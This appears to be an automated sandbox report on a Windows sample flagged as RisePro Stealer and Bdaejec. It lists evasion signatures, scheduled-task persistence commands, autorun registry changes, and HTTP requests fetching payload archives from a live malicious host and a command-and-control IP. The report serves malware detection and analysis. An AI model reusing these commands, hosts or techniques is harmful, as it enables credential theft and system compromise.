Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_37.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1A_37.exe
Analysis ID:1481140
MD5:6a672bbdc7865a7518441284d853f8d8
SHA1:be887b22a197194e90f9a090174f258bdb062562
SHA256:a3f809a16001f7edea3b2c946286c80db82531a8cd037320fba6cf8bbcf68284
Tags:exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • Lisect_AVT_24003_G1A_37.exe (PID: 3712 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe" MD5: 6A672BBDC7865A7518441284D853F8D8)
    • MlpxPf.exe (PID: 1840 cmdline: C:\Users\user\AppData\Local\Temp\MlpxPf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • schtasks.exe (PID: 5784 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4940 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MPGPH131.exe (PID: 6312 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 6A672BBDC7865A7518441284D853F8D8)
  • MPGPH131.exe (PID: 1304 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 6A672BBDC7865A7518441284D853F8D8)
  • RageMP131.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 6A672BBDC7865A7518441284D853F8D8)
    • MlpxPf.exe (PID: 7588 cmdline: C:\Users\user\AppData\Local\Temp\MlpxPf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            Click to see the 9 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe, ProcessId: 3712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
            No Snort rule has matched
            Timestamp:2024-07-25T04:53:12.283927+0200
            SID:2838522
            Source Port:63806
            Destination Port:53
            Protocol:UDP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:42.698687+0200
            SID:2807908
            Source Port:49722
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:25.674940+0200
            SID:2046269
            Source Port:49712
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:20.335736+0200
            SID:2046269
            Source Port:49706
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:36.849216+0200
            SID:2046269
            Source Port:49719
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:22.721123+0200
            SID:2049060
            Source Port:49713
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:30.531280+0200
            SID:2807908
            Source Port:49717
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:17.362336+0200
            SID:2049060
            Source Port:49706
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:12.855208+0200
            SID:2807908
            Source Port:49704
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:36.819100+0200
            SID:2807908
            Source Port:49720
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:16.800194+0200
            SID:2807908
            Source Port:49705
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:27.676877+0200
            SID:2022930
            Source Port:443
            Destination Port:49714
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:39.900149+0200
            SID:2807908
            Source Port:49721
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:54:05.326511+0200
            SID:2022930
            Source Port:443
            Destination Port:49723
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T04:53:23.435986+0200
            SID:2028371
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T04:53:33.718695+0200
            SID:2807908
            Source Port:49718
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T04:53:25.690426+0200
            SID:2046269
            Source Port:49713
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Lisect_AVT_24003_G1A_37.exeAvira: detected
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarYAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar=6Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarpAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarHAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarqAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rar66Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar#7Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rar.7Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarS6Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rartAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarcC:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarkAvira URL Cloud: Label: phishing
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeReversingLabs: Detection: 94%
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeReversingLabs: Detection: 94%
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeReversingLabs: Detection: 92%
            Source: Lisect_AVT_24003_G1A_37.exeReversingLabs: Detection: 94%
            Source: Lisect_AVT_24003_G1A_37.exeVirustotal: Detection: 84%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: Lisect_AVT_24003_G1A_37.exeJoe Sandbox ML: detected
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

            Spreading

            barindex
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_003529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_003529E2
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_005929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,18_2_005929E2
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00352B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00352B8C
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 799
            Source: global trafficTCP traffic: 192.168.2.8:49704 -> 44.221.84.105:799
            Source: global trafficTCP traffic: 192.168.2.8:49706 -> 193.233.132.62:50500
            Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0028DB60 recv,WSAStartup,closesocket,socket,connect,closesocket,0_2_0028DB60
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
            Source: MlpxPf.exe, 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000002.00000003.1447308888.0000000001120000.00000004.00001000.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000012.00000003.1617245966.0000000001380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
            Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar.7
            Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar66
            Source: MlpxPf.exe, 00000012.00000003.1624031200.00000000012B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
            Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
            Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar#7
            Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar=6
            Source: MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarS6
            Source: MlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rart
            Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
            Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarC:
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rark
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
            Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarY
            Source: MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarcC:
            Source: MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarq
            Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
            Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
            Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
            Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
            Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
            Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
            Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
            Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
            Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
            Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
            Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
            Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
            Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
            Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
